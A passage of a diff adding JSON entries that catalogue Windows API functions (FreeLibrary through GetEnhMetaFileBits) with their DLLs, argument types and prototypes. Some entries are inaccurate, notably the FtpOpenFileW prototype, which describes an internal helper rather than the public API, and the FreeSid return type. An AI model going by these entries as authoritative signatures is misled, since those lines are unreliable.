"kernel32.dll", + "full_prototype": "BOOL FreeLibrary(HMODULE hModule);" + }, + { + "function_name": "FreeLibraryAndExitThread", + "arguments": [ + "HMODULE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID FreeLibraryAndExitThread( HMODULE hLibModule, DWORD dwExitCode );" + }, + { + "function_name": "FreeResource", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FreeResource(HGLOBAL hResource);" + }, + { + "function_name": "FreeSid", + "arguments": [ + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "PVOID FreeSid( PSID pSid );" + }, + { + "function_name": "FtpCreateDirectoryA", + "arguments": [ + "IN HINTERNET", + "IN LPCTSTR" + ], + "dll_name": "wininet.dll", + "full_prototype": "BOOL FtpCreateDirectory( IN HINTERNET hFtpSession, IN LPCTSTR lpszDirectory);" + }, + { + "function_name": "FtpOpenFileA", + "arguments": [ + "HINTERNET", + "LPCTSTR", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "wininet.dll", + "full_prototype": "HINTERNET FtpOpenFileA( HINTERNET hConnect, LPCTSTR lpszFileName, DWORD dwAccess, DWORD dwFlags, DWORD dwContext);" + }, + { + "function_name": "FtpOpenFileW", + "arguments": [ + "WORKREQUEST*" + ], + "dll_name": "wininet.dll", + "full_prototype": "static void FtpOpenFileW(WORKREQUEST* workRequest);" + }, + { + "function_name": "GdiComment", + "arguments": [ + "HDC", + "UINT", + "CONST BYTE *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GdiComment(HDC hdc, UINT cbSize, CONST BYTE * lpData);" + }, + { + "function_name": "GdiFlush", + "arguments": [ + "" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GdiFlush(VOID);" + }, + { + "function_name": "GdiGetBatchLimit", + "arguments": [ + "" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GdiGetBatchLimit(VOID);" + }, + { + "function_name": "GdiSetBatchLimit", + "arguments": [ + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GdiSetBatchLimit(DWORD dwLimit);" + }, + { + "function_name": "GenerateConsoleCtrlEvent", + "arguments": [ + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GenerateConsoleCtrlEvent( DWORD dwCtrlEvent, DWORD dwProcessGroupId);" + }, + { + "function_name": "GetAce", + "arguments": [ + "PACL", + "DWORD", + "LPVOID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetAce( PACL pAcl, DWORD dwAceIndex, LPVOID *pAce );" + }, + { + "function_name": "GetAclInformation", + "arguments": [ + "PACL", + "LPVOID", + "DWORD", + "ACL_INFORMATION_CLASS" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetAclInformation( PACL pAcl, LPVOID pAclInformation, DWORD nAclInformationLength, ACL_INFORMATION_CLASS dwAclInformationClass );" + }, + { + "function_name": "GetACP", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetACP(VOID);" + }, + { + "function_name": "GetActiveWindow", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetActiveWindow(VOID);" + }, + { + "function_name": "GetArcDirection", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetArcDirection(HDC hdc);" + }, + { + "function_name": "GetAspectRatioFilterEx", + "arguments": [ + "HDC", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetAspectRatioFilterEx(HDC hdc, LPSIZE lpAspectRatio);" + }, + { + "function_name": "GetAsyncKeyState", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "SHORT GetAsyncKeyState(int vKey);" + }, + { + "function_name": "GetAtomNameA", + "arguments": [ + "ATOM", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetAtomNameA( ATOM nAtom, LPTSTR lpBuffer, int nSize );" + }, + { + "function_name": "GetAtomNameW", + "arguments": [ + "ATOM", + "LPWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetAtomNameW( ATOM atom, LPWSTR buffer, INT count );" + }, + { + "function_name": "GetBinaryTypeA", + "arguments": [ + "LPCTSTR", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetBinaryTypeA( LPCTSTR lpApplicationName, LPDWORD lpBinaryType );" + }, + { + "function_name": "GetBinaryTypeW", + "arguments": [ + "LPCWSTR", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetBinaryTypeW( LPCWSTR lpApplicationName, LPDWORD lpBinaryType );" + }, + { + "function_name": "GetBitmapBits", + "arguments": [ + "HBITMAP", + "LONG", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "LONG GetBitmapBits(HBITMAP hbmp, LONG cbBuffer, LPVOID lpvBits);" + }, + { + "function_name": "GetBitmapDimensionEx", + "arguments": [ + "HBITMAP", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetBitmapDimensionEx(HBITMAP hBitmap,LPSIZE lpDimension);" + }, + { + "function_name": "GetBkColor", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF GetBkColor(HDC hdc);" + }, + { + "function_name": "GetBkMode", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetBkMode(HDC hdc);" + }, + { + "function_name": "GetBoundsRect", + "arguments": [ + "HDC", + "LPRECT", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetBoundsRect(HDC hdc, LPRECT lprcBounds, UINT flags);" + }, + { + "function_name": "GetBrushOrgEx", + "arguments": [ + "HDC", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetBrushOrgEx(HDC hdc, LPPOINT lppt);" + }, + { + "function_name": "GetCapture", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetCapture(VOID);" + }, + { + "function_name": "GetCaretBlinkTime", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetCaretBlinkTime(VOID);" + }, + { + "function_name": "GetCaretPos", + "arguments": [ + "LPPOINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetCaretPos(LPPOINT lpPoint);" + }, + { + "function_name": "GetCharABCWidthsA", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPABC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharABCWidthsA(HDC hdc, UINT uFirstChar, UINT uLastChar, LPABC lpabc);" + }, + { + "function_name": "GetCharABCWidthsW", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPABC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharABCWidthsW(HDC hdc, UINT firstChar, UINT lastChar, LPABC abc);" + }, + { + "function_name": "GetCharABCWidthsFloatA", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPABCFLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharABCWidthsFloatA(HDC hdc, UINT iFirstChar, UINT iLastChar,LPABCFLOAT lpABCF);" + }, + { + "function_name": "GetCharABCWidthsFloatW", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPABCFLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharABCWidthsFloatW(HDC hdc, UINT first, UINT last, LPABCFLOAT abcf);" + }, + { + "function_name": "GetCharWidth32A", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharWidth32A(HDC hdc, UINT iFirstChar, UINT iLastChar, LPINT lpBuffer);" + }, + { + "function_name": "GetCharWidth32W", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharWidth32W(HDC hdc, UINT iFirstChar, UINT iLastChar, LPINT lpBuffer);" + }, + { + "function_name": "GetCharWidthA", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharWidthA(HDC hdc, UINT iFirstChar, UINT iLastChar,LPINT lpBuffer);" + }, + { + "function_name": "GetCharWidthW", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharWidthW(HDC hdc, UINT iFirstChar, UINT iLastChar,LPINT lpBuffer);" + }, + { + "function_name": "GetCharWidthFloatA", + "arguments": [ + "HDC", + "UINT", + "UINT", + "PFLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharWidthFloatA(HDC hdc, UINT iFirstChar, UINT iLastChar, PFLOAT pxBuffer);" + }, + { + "function_name": "GetCharWidthFloatW", + "arguments": [ + "HDC", + "UINT", + "UINT", + "PFLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCharWidthFloatW(HDC hdc, UINT iFirstChar, UINT iLastChar, PFLOAT pxBuffer);" + }, + { + "function_name": "GetCharacterPlacementA", + "arguments": [ + "HDC", + "LPCTSTR", + "int", + "int", + "LPGCP_RESULTS", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetCharacterPlacementA(HDC hdc, LPCTSTR lpString,int nCount, int nMaxExtent, LPGCP_RESULTS *lpResults, DWORD dwFlags);" + }, + { + "function_name": "GetCharacterPlacementW", + "arguments": [ + "HDC", + "LPCWSTR", + "int", + "int", + "GCP_RESULTSW*", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetCharacterPlacementW(HDC hdc, LPCWSTR lpString, int uCount, int nMaxExtent, GCP_RESULTSW* lpResults, DWORD dwFlags);" + }, + { + "function_name": "GetClassInfoA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "LPWNDCLASS" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetClassInfoA(HINSTANCE hInstance, LPCTSTR lpClassName, LPWNDCLASS lpWndClass);" + }, + { + "function_name": "GetClassInfoExA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "LPWNDCLASSEX" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetClassInfoExA(HINSTANCE hinst, LPCTSTR lpszClass, LPWNDCLASSEX lpwcx);" + }, + { + "function_name": "GetClassInfoExW", + "arguments": [ + "HINSTANCE", + "LPCWSTR", + "LPWNDCLASSEXW" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetClassInfoExW(HINSTANCE hinst, LPCWSTR lpszClass, LPWNDCLASSEXW lpwcx);" + }, + { + "function_name": "GetClassInfoW", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "LPWNDCLASS" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetClassInfoW(HINSTANCE hInstance, LPCTSTR lpClassName, LPWNDCLASS lpWndClass);" + }, + { + "function_name": "GetClassLongA", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetClassLongA(HWND hWnd,int nIndex);" + }, + { + "function_name": "GetClassLongW", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetClassLongW(HWND hWnd, int nIndex);" + }, + { + "function_name": "GetClassNameA", + "arguments": [ + "HWND", + "LPTSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetClassNameA(HWND hWnd,LPTSTR lpClassName,int nMaxCount);" + }, + { + "function_name": "GetClassNameW", + "arguments": [ + "HWND", + "LPWSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetClassNameW(HWND hWnd, LPWSTR lpClassName, int nMaxCount);" + }, + { + "function_name": "GetClassWord", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "WORD GetClassWord(HWND hWnd, int nIndex);" + }, + { + "function_name": "GetClientRect", + "arguments": [ + "HWND", + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetClientRect(HWND hWnd, LPRECT lpRect);" + }, + { + "function_name": "GetClipboardData", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE GetClipboardData(UINT uFormat);" + }, + { + "function_name": "GetClipboardFormatNameA", + "arguments": [ + "UINT", + "LPTSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetClipboardFormatNameA(UINT format, LPTSTR lpszFormatName,int cchMaxCount);" + }, + { + "function_name": "GetClipboardFormatNameW", + "arguments": [ + "UINT", + "LPWSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetClipboardFormatNameW(UINT format, LPWSTR lpszFormatName,int cchMaxCount);" + }, + { + "function_name": "GetClipboardOwner", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetClipboardOwner(VOID);" + }, + { + "function_name": "GetClipboardViewer", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetClipboardViewer(VOID);" + }, + { + "function_name": "GetClipBox", + "arguments": [ + "HDC", + "LPRECT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetClipBox(HDC hdc, LPRECT lprc);" + }, + { + "function_name": "GetClipCursor", + "arguments": [ + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetClipCursor(LPRECT lpRect);" + }, + { + "function_name": "GetClipRgn", + "arguments": [ + "HDC", + "HRGN" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetClipRgn(HDC hdc, HRGN hrgn);" + }, + { + "function_name": "GetColorAdjustment", + "arguments": [ + "HDC", + "LPCOLORADJUSTMENT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetColorAdjustment(HDC hdc, LPCOLORADJUSTMENT lpca);" + }, + { + "function_name": "GetColorSpace", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HANDLE GetColorSpace(HDC hdc);" + }, + { + "function_name": "GetCommandLineA", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPTSTR GetCommandLineA(void);" + }, + { + "function_name": "GetCommandLineW", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPWSTR GetCommandLineW(VOID);" + }, + { + "function_name": "GetCommConfig", + "arguments": [ + "HANDLE", + "LPCOMMCONFIG", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCommConfig( HANDLE hCommDev, LPCOMMCONFIG lpCC, LPDWORD lpdwSize );" + }, + { + "function_name": "GetCommMask", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCommMask( HANDLE hFile, LPDWORD lpEvtMask );" + }, + { + "function_name": "GetCommModemStatus", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCommModemStatus( HANDLE hFile, LPDWORD lpModemStat );" + }, + { + "function_name": "GetCommProperties", + "arguments": [ + "HANDLE", + "LPCOMMPROP" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCommProperties( HANDLE hFile, LPCOMMPROP lpCommProp );" + }, + { + "function_name": "GetCommState", + "arguments": [ + "HANDLE", + "LPDCB" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCommState( HANDLE hFile, LPDCB lpDCB );" + }, + { + "function_name": "GetCommTimeouts", + "arguments": [ + "HANDLE", + "LPCOMMTIMEOUTS" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCommTimeouts( HANDLE hFile, LPCOMMTIMEOUTS lpCommTimeouts );" + }, + { + "function_name": "GetCompressedFileSizeA", + "arguments": [ + "LPCTSTR", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetCompressedFileSizeA( LPCTSTR lpFileName, LPDWORD lpFileSizeHigh );" + }, + { + "function_name": "GetCompressedFileSizeW", + "arguments": [ + "LPCWSTR", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetCompressedFileSizeW( LPCWSTR name, LPDWORD size_high );" + }, + { + "function_name": "GetComputerNameA", + "arguments": [ + "LPTSTR", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetComputerNameA(LPTSTR lpBuffer,LPDWORD nSize);" + }, + { + "function_name": "GetComputerNameW", + "arguments": [ + "LPWSTR", + "PDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetComputerNameW(LPWSTR lpBuffer,PDWORD nSize);" + }, + { + "function_name": "GetComputerNameExA", + "arguments": [ + "COMPUTER_NAME_FORMAT", + "LPTSTR", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetComputerNameExA(COMPUTER_NAME_FORMAT NameType, LPTSTR lpBuffer, LPDWORD lpnSize);" + }, + { + "function_name": "GetComputerObjectNameA", + "arguments": [ + "EXTENDED_NAME_FORMAT", + "LPTSTR", + "PULONG" + ], + "dll_name": "secur32.dll", + "full_prototype": "BOOLEAN GetComputerObjectNameA( EXTENDED_NAME_FORMAT NameFormat, LPTSTR lpNameBuffer, PULONG lpnSize);" + }, + { + "function_name": "GetConsoleCursorInfo", + "arguments": [ + "HANDLE", + "PCONSOLE_CURSOR_INFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetConsoleCursorInfo( HANDLE hConsoleOutput, PCONSOLE_CURSOR_INFO lpConsoleCursorInfo );" + }, + { + "function_name": "GetConsoleCP", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetConsoleCP(VOID);" + }, + { + "function_name": "GetConsoleMode", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetConsoleMode( HANDLE hConsoleHandle, LPDWORD lpMode );" + }, + { + "function_name": "GetConsoleOutputCP", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetConsoleOutputCP(VOID);" + }, + { + "function_name": "GetConsoleScreenBufferInfo", + "arguments": [ + "HANDLE", + "PCONSOLE_SCREEN_BUFFER_INFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetConsoleScreenBufferInfo( HANDLE hConsoleOutput, PCONSOLE_SCREEN_BUFFER_INFO lpConsoleScreenBufferInfo );" + }, + { + "function_name": "GetConsoleTitleA", + "arguments": [ + "LPSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetConsoleTitleA(LPSTR title, DWORD size);" + }, + { + "function_name": "GetConsoleTitleW", + "arguments": [ + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetConsoleTitleW( LPWSTR title, DWORD size );" + }, + { + "function_name": "GetCPInfo", + "arguments": [ + "UINT", + "LPCPINFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo);" + }, + { + "function_name": "GetCurrencyFormatA", + "arguments": [ + "LCID", + "DWORD", + "LPCTSTR", + "CONST CURRENCYFMT *", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetCurrencyFormatA( LCID Locale, DWORD dwFlags, LPCTSTR lpValue, CONST CURRENCYFMT * lpFormat, LPTSTR lpCurrencyStr, int cchCurrency );" + }, + { + "function_name": "GetCurrencyFormatW", + "arguments": [ + "LCID", + "DWORD", + "LPCWSTR", + "const CURRENCYFMTW*", + "LPWSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "INT GetCurrencyFormatW( LCID lcid, DWORD dwFlags, LPCWSTR lpszValue, const CURRENCYFMTW* lpFormat, LPWSTR lpCurrencyStr, int cchOut );" + }, + { + "function_name": "GetCurrentDirectoryA", + "arguments": [ + "DWORD", + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetCurrentDirectoryA( DWORD nBufferLength, LPTSTR lpBuffer);" + }, + { + "function_name": "GetCurrentDirectoryW", + "arguments": [ + "DWORD", + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetCurrentDirectoryW(DWORD nBufferLength,LPWSTR lpBuffer);" + }, + { + "function_name": "GetCurrentHwProfileA", + "arguments": [ + "LPHW_PROFILE_INFOA" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetCurrentHwProfileA( LPHW_PROFILE_INFOA pInfo );" + }, + { + "function_name": "GetCurrentHwProfileW", + "arguments": [ + "LPHW_PROFILE_INFOW" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetCurrentHwProfileW( LPHW_PROFILE_INFOW pInfo );" + }, + { + "function_name": "GetCurrentObject", + "arguments": [ + "HDC", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HGDIOBJ GetCurrentObject(HDC hdc, UINT uObjectType);" + }, + { + "function_name": "GetCurrentPositionEx", + "arguments": [ + "HDC", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetCurrentPositionEx(HDC hdc, LPPOINT lpPoint);" + }, + { + "function_name": "GetCurrentProcess", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE WINAPI GetCurrentProcess(void);" + }, + { + "function_name": "GetCurrentProcessId", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetCurrentProcessId(VOID);" + }, + { + "function_name": "GetCurrentProcessorNumber", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetCurrentProcessorNumber(void);" + }, + { + "function_name": "GetCurrentThread", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE WINAPI GetCurrentThread(void);" + }, + { + "function_name": "GetCurrentThreadId", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD WINAPI GetCurrentThreadId(void);" + }, + { + "function_name": "GetCursor", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR GetCursor(VOID);" + }, + { + "function_name": "GetCursorPos", + "arguments": [ + "LPPOINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetCursorPos(LPPOINT lpPoint);" + }, + { + "function_name": "GetDateFormatA", + "arguments": [ + "LCID", + "DWORD", + "CONST SYSTEMTIME *", + "LPCTSTR", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetDateFormatA( LCID Locale, DWORD dwFlags, CONST SYSTEMTIME * lpDate, LPCTSTR lpFormat, LPTSTR lpDateStr, int cchDate );" + }, + { + "function_name": "GetDateFormatW", + "arguments": [ + "LCID", + "DWORD", + "const SYSTEMTIME*", + "LPCWSTR", + "LPWSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetDateFormatW( LCID lcid, DWORD dwFlags, const SYSTEMTIME* lpTime, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchOut );" + }, + { + "function_name": "GetDC", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HDC GetDC(HWND hWnd);" + }, + { + "function_name": "GetDCEx", + "arguments": [ + "HWND", + "HRGN", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HDC GetDCEx(HWND hWnd, HRGN hrgnClip, DWORD flags);" + }, + { + "function_name": "GetDCOrgEx", + "arguments": [ + "HDC", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetDCOrgEx(HDC hdc, LPPOINT lpPoint);" + }, + { + "function_name": "GetDefaultCommConfigA", + "arguments": [ + "LPCSTR", + "LPCOMMCONFIG", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetDefaultCommConfigA( LPCSTR lpszName, LPCOMMCONFIG lpCC, LPDWORD lpdwSize );" + }, + { + "function_name": "GetDefaultCommConfigW", + "arguments": [ + "LPCWSTR", + "LPCOMMCONFIG", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetDefaultCommConfigW( LPCWSTR lpszName, LPCOMMCONFIG lpCC, LPDWORD lpdwSize );" + }, + { + "function_name": "GetDesktopWindow", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetDesktopWindow(VOID);" + }, + { + "function_name": "GetDeviceCaps", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetDeviceCaps(HDC hdc,int nIndex);" + }, + { + "function_name": "GetDeviceGammaRamp", + "arguments": [ + "HDC", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetDeviceGammaRamp(HDC hdc, LPVOID lpRamp);" + }, + { + "function_name": "GetDialogBaseUnits", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG GetDialogBaseUnits(VOID);" + }, + { + "function_name": "GetDIBColorTable", + "arguments": [ + "HDC", + "UINT", + "UINT", + "RGBQUAD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetDIBColorTable(HDC hdc,UINT uStartIndex, UINT cEntries, RGBQUAD *pColors);" + }, + { + "function_name": "GetDIBits", + "arguments": [ + "HDC", + "HBITMAP", + "UINT", + "UINT", + "LPVOID", + "LPBITMAPINFO", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetDIBits(HDC hdc,HBITMAP hbmp, UINT uStartScan, UINT cScanLines, LPVOID lpvBits,LPBITMAPINFO lpbi, UINT uUsage);" + }, + { + "function_name": "GetDiskFreeSpaceA", + "arguments": [ + "LPCTSTR", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetDiskFreeSpaceA( LPCTSTR lpRootPathName, LPDWORD lpSectorsPerCluster, LPDWORD lpBytesPerSector, LPDWORD lpNumberOfFreeClusters, LPDWORD lpTotalNumberOfClusters );" + }, + { + "function_name": "GetDiskFreeSpaceExA", + "arguments": [ + "LPCSTR", + "PULARGE_INTEGER", + "PULARGE_INTEGER", + "PULARGE_INTEGER" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetDiskFreeSpaceExA( LPCSTR root, PULARGE_INTEGER avail, PULARGE_INTEGER total, PULARGE_INTEGER totalfree );" + }, + { + "function_name": "GetDiskFreeSpaceExW", + "arguments": [ + "LPCWSTR", + "PULARGE_INTEGER", + "PULARGE_INTEGER", + "PULARGE_INTEGER" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetDiskFreeSpaceExW( LPCWSTR root, PULARGE_INTEGER avail, PULARGE_INTEGER total, PULARGE_INTEGER totalfree );" + }, + { + "function_name": "GetDiskFreeSpaceW", + "arguments": [ + "LPCWSTR", + "PDWORD", + "PDWORD", + "PDWORD", + "PDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetDiskFreeSpaceW(LPCWSTR lpRootPathName,PDWORD lpSectorsPerCluster,PDWORD lpBytesPerSector,PDWORD lpNumberOfFreeClusters,PDWORD lpTotalNumberOfClusters);" + }, + { + "function_name": "GetDlgCtrlID", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetDlgCtrlID(HWND hwndCtl);" + }, + { + "function_name": "GetDlgItem", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetDlgItem(HWND hDlg,int nIDDlgItem);" + }, + { + "function_name": "GetDlgItemInt", + "arguments": [ + "HWND", + "int", + "BOOL*", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetDlgItemInt(HWND hDlg,int nIDDlgItem, BOOL* lpTranslated, BOOL bSigned);" + }, + { + "function_name": "GetDlgItemTextA", + "arguments": [ + "HWND", + "int", + "LPTSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetDlgItemTextA(HWND hDlg, int nIDDlgItem, LPTSTR lpString, int nMaxCount);" + }, + { + "function_name": "GetDlgItemTextW", + "arguments": [ + "HWND", + "int", + "LPWSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetDlgItemTextW(HWND hDlg, int nIDDlgItem, LPWSTR lpString, int nMaxCount);" + }, + { + "function_name": "GetDoubleClickTime", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetDoubleClickTime(VOID);" + }, + { + "function_name": "GetDriveTypeA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetDriveTypeA(LPCTSTR lpRootPathName);" + }, + { + "function_name": "GetDriveTypeW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetDriveTypeW(LPCWSTR root);" + }, + { + "function_name": "GetEnhMetaFileA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE GetEnhMetaFileA(LPCTSTR lpszMetaFile);" + }, + { + "function_name": "GetEnhMetaFileW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE GetEnhMetaFileW(LPCWSTR lpszMetaFile);" + }, + { + "function_name": "GetEnhMetaFileBits", + "arguments": [ + "HENHMETAFILE", + "UINT", + "LPBYTE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetEnhMetaFileBits(HENHMETAFILE hemf, UINT cbBuffer, LPBYTE lpbBuffer);" + }, + { + 